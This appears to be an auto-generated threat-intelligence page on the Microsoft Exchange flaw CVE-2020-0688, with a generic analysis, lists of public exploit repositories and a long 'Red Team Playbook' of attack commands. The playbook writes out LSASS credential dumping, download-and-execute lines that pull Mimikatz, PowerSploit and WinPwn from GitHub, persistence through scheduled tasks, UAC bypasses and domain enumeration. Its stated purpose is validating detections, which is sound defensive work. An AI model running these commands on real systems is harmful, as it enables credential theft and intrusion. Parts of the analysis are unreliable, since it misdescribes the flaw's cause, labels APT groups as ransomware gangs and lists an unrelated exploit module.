CVE-2020-0688
Overview
This vulnerability is a memory corruption flaw within Microsoft Exchange Server's handling of objects in memory, specifically related to improper validation and management of serialized data structures. The root cause lies in the failure of the Exchange software to correctly process certain memory objects, leading to a corruption state. The affected component is the Microsoft Exchange Server software across multiple versions, particularly in the processing routines that handle internal memory objects.
Vulnerability Description
A remote code execution vulnerability exists in Microsoft Exchange software when the software fails to properly handle objects in memory, aka 'Microsoft Exchange Memory Corruption Vulnerability'.
Impact
An attacker with low-privileged access can exploit this vulnerability remotely without user interaction to execute arbitrary code on the Exchange Server. This allows full compromise of the mail server, including access to sensitive email data, credentials, and the ability to move laterally within the network. The vulnerability enables attackers to gain control over the affected system, potentially leading to data breaches, persistent access, and disruption of mail services critical to business operations.
Solution
Microsoft has released security updates addressing this vulnerability in Exchange Server 2010 SP3 Rollup 30, 2013 Cumulative Update 23, 2016 Cumulative Updates 14 and 15, and 2019 Cumulative Update 3. Administrators should apply the latest cumulative updates as detailed in the Microsoft Security Advisory available at https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688. No alternative workarounds are recommended; patching the affected Exchange Server versions is the primary mitigation step.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
MuddyWater
|
MEDIUM | — | correlation_mitre |
|
Kimsuky
|
MEDIUM | — | correlation_mitre |
|
Dragonfly
|
MEDIUM | — | correlation_mitre |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
A significant vulnerability exists within Microsoft Exchange software, characterized by improper handling of objects in memory, leading to potential remote code execution. This flaw arises when the software fails to adequately manage memory resources, allowing an attacker to manipulate the memory of the application. By exploiting this weakness, an attacker could execute arbitrary code on the server, potentially gaining control over the system and accessing sensitive data. The affected versions include various iterations of Exchange Server from 2010 through 2019, particularly those associated with specific service packs and cumulative updates. The high CVSS score of 8.8 indicates the severity of this vulnerability, underscoring the critical need for organizations to address it promptly.
Attack vectors for this vulnerability are particularly concerning, as they can be executed remotely without requiring user interaction. An attacker could leverage crafted requests sent to the Exchange server, triggering the memory corruption issue. This could occur through various means, such as email messages, web requests, or other protocols utilized by the Exchange server. Once the attacker successfully exploits the vulnerability, they could execute arbitrary code with the same privileges as the Exchange service, which often runs with elevated permissions. This capability allows for a wide range of malicious activities, including data exfiltration, lateral movement within the network, or deploying additional malware.
The real-world implications of this vulnerability are profound, particularly for organizations that rely on Microsoft Exchange for email and communication. Successful exploitation could lead to significant business risks, including data breaches, loss of sensitive information, and disruption of critical services. The potential for financial loss is substantial, as organizations may face regulatory fines, legal liabilities, and reputational damage resulting from a security incident. Moreover, the operational impact of a compromised Exchange server could lead to downtime, affecting productivity and customer trust. Given the central role of email in business operations, the ramifications of such an attack can extend far beyond immediate financial costs.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating and patching Exchange servers is crucial, as Microsoft has released security updates to address this issue. Organizations should prioritize the application of these patches, particularly in environments that utilize affected versions of Exchange. Additionally, employing robust intrusion detection systems can help identify unusual patterns of behavior indicative of exploitation attempts. Monitoring logs for suspicious activity, such as unexpected access to sensitive data or unusual outbound connections, can also aid in early detection of potential breaches.
In conclusion, the memory corruption vulnerability in Microsoft Exchange poses a significant threat to organizations using affected versions of the software. The ability for attackers to execute arbitrary code remotely highlights the critical need for timely patching and proactive security measures. By understanding the nature of the vulnerability, potential attack vectors, and the associated risks, organizations can better prepare themselves to defend against exploitation. Implementing comprehensive detection and mitigation strategies will be essential in safeguarding sensitive information and maintaining the integrity of business operations in the face of evolving cyber threats.
CSURFACE threat intelligence has identified a marked escalation in the exploit landscape for CVE-2020-0688, highlighted by the emergence of multiple public proof-of-concept exploit codes and the release of a Metasploit module that significantly lowers the barrier to exploitation. This development is compounded by the vulnerability’s recent inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring its elevated priority for remediation efforts. Our telemetry indicates a notable surge in ransomware group associations leveraging this vulnerability, including prominent actors such as Kimsuky, MuddyWater, and Dragonfly, which signals an increased likelihood of targeted ransomware campaigns exploiting this flaw. The EPSS score’s substantial rise to a high-risk threshold further corroborates the growing exploitation potential. Collectively, these factors elevate the threat level from theoretical to actively exploited, demanding heightened vigilance from defenders as the window for opportunistic and sophisticated attacks widens considerably.
Affected Products (6)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Microsoft | Exchange Server | 2010 |
cpe:2.3:a:microsoft:exchange_server:2010:sp3_rollup_30:*:*:*:*:*:*
|
|
|
Microsoft | Exchange Server | 2013 |
cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*
|
|
|
Microsoft | Exchange Server | 2016 |
cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_14:*:*:*:*:*:*
|
|
|
Microsoft | Exchange Server | 2016 |
cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_15:*:*:*:*:*:*
|
|
|
Microsoft | Exchange Server | 2019 |
cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_3:*:*:*:*:*:*
|
|
|
Microsoft | Exchange Server | 2019 |
cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_4:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (2)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability
exploits/windows/local/cve_2020_0787_bits_arbitrary_file_move
|
itm4n, gwillcox-r7 | Unknown | win | View |
|
Exchange Control Panel ViewState Deserialization
exploits/windows/http/exchange_ecp_viewstate
|
- | Unknown | - | View |
ExploitDB (2)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution | Photubias | remote | windows | - | View |
| Exchange Control Panel - Viewstate Deserialization (Metasploit) | Metasploit | remote | windows | - | View |
GitHub PoCs (26)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
zcgonvh/CVE-2020-0688
Exploit and detect tools for CVE-2020-0688
|
zcgonvh | 354 | 74 | 2020-03-01 | View |
|
Ridter/cve-2020-0688
cve-2020-0688
|
Ridter | 326 | 82 | 2020-02-27 | View |
|
random-robbie/cve-2020-0688
cve-2020-0688
|
random-robbie | 165 | 46 | 2020-02-25 | View |
|
Yt1g3r/CVE-2020-0688_EXP
CVE-2020-0688_EXP Auto trigger payload & encrypt method
|
Yt1g3r | 145 | 58 | 2020-02-27 | View |
|
Jumbo-WJB/CVE-2020-0688
CVE-2020-0688 - Exchange
|
Jumbo-WJB | 66 | 20 | 2020-02-26 | View |
|
onSec-fr/CVE-2020-0688-Scanner
Quick tool for checking CVE-2020-0688 on multiple hosts with a non-intrusive method.
|
onSec-fr | 37 | 10 | 2020-02-28 | View |
|
w4fz5uck5/cve-2020-0688-webshell-upload-technique
cve-2020-0688 UNIVERSAL Python implementation utilizing ASPX webshell for command output
|
w4fz5uck5 | 23 | 11 | 2020-06-12 | View |
|
MrTiz/CVE-2020-0688
Remote Code Execution on Microsoft Exchange Server through fixed cryptographic keys
|
MrTiz | 21 | 5 | 2021-01-04 | View |
|
ravinacademy/CVE-2020-0688
Exploitation Script for CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability"
|
ravinacademy | 11 | 9 | 2020-03-31 | View |
|
W01fh4cker/CVE-2020-0688-GUI
GUI Exploit Tool for CVE-2020-0688(Microsoft Exchange default MachineKeySection deserialize vulnerability)
|
W01fh4cker | 16 | 3 | 2024-05-09 | View |
|
youncyb/CVE-2020-0688
CVE-2020-0688
|
youncyb | 10 | 3 | 2020-02-28 | View |
|
zyn3rgy/ecp_slap
CVE-2020-0688 PoC
|
zyn3rgy | 11 | 1 | 2020-10-23 | View |
|
justin-p/PSForgot2kEyXCHANGE
PoC for Forgot2kEyXCHANGE (CVE-2020-0688) written in PowerShell
|
justin-p | 5 | 6 | 2020-03-04 | View |
|
cert-lv/CVE-2020-0688
Vulnerability scanner for CVE-2020-0688
|
cert-lv | 8 | 1 | 2020-03-19 | View |
|
mahyarx/Exploit_CVE-2020-0688
CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability"
|
mahyarx | 2 | 3 | 2020-04-05 | View |
|
murataydemir/CVE-2020-0688
[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic Key Remote Code Execution (RCE)
|
murataydemir | 4 | 1 | 2020-08-17 | View |
|
ktpdpro/CVE-2020-0688
PoC RCE Reverse Shell for CVE-2020-0688
|
ktpdpro | 3 | 2 | 2020-04-22 | View |
|
righter83/CVE-2020-0688
Exchange Scanner CVE-2020-0688
|
righter83 | 2 | 3 | 2020-02-27 | View |
|
truongtn/cve-2020-0688
I made this script for conducting CVE-2020-0688 more rapidly. It helps to improve checking the vuln, reducing hugely ste...
|
truongtn | 1 | 1 | 2020-02-28 | View |
|
SLSteff/CVE-2020-0688-Scanner
Scans for Microsoft Exchange Versions with masscan
|
SLSteff | 2 | 0 | 2020-10-29 | View |
|
1337-llama/CVE-2020-0688-Python3
Exploit updated to use Python 3.
|
1337-llama | 2 | 0 | 2022-10-19 | View |
|
chudamax/CVE-2020-0688-Exchange2010
CVE-2020-0688 modified exploit for Exchange 2010
|
chudamax | 1 | 1 | 2023-08-02 | View |
|
ann0906/proxylogon
事件: 微軟(Microsoft)上周公布了修補遭到駭客攻擊的 Exchange Server 漏洞,全球恐有數萬個組織受到影響。網域與被入侵的Exchange郵件伺服器有關,而這臺伺服器後來被駭客當作C&C中繼站使用,導致接下來發生加密攻...
|
ann0906 | 1 | 0 | 2021-05-03 | View |
|
7heKnight/CVE-2020-0688
CVE-2020-0688_Microsoft Exchange default MachineKeySection deserialize vulnerability
|
7heKnight | 0 | 0 | 2022-05-12 | View |
|
tvdat20004/CVE-2020-0688
CVE-2020-0688: Remote Code Execution on Microsoft Exchange Server Through Fixed Cryptographic Keys
|
tvdat20004 | 0 | 0 | 2025-08-04 | View |
|
iamwajd/Cyber-Attack-Analysis
A deep-dive security analysis into the 2020 Virgin Mobile KSA data breach. This study dissects the exploitation of CVE-2...
|
iamwajd | 0 | 0 | 2026-02-18 | View |
Ransomware Groups 3
Threat Feed
24 eventsSighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AmmyyAdmin, AnyDesk, Atera (552 known victims)
Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Atera, BITSAdmin, Backstab (Process Explorer driver) (523 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
76 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-0688 |
| portal.msrc.microsoft.com |
GitHub CVE
x_refsource_MISC
|
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688 |
| zerodayinitiative.com |
GitHub CVE
x_refsource_MISC
|
https://www.zerodayinitiative.com/advisories/ZDI-20-258/ |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/156592/Microsoft-Exchange-2019-15.2.221.12-Remote-Code-Execution.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/156620/Exchange-Control-Panel-Viewstate-Deserialization.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-0688 |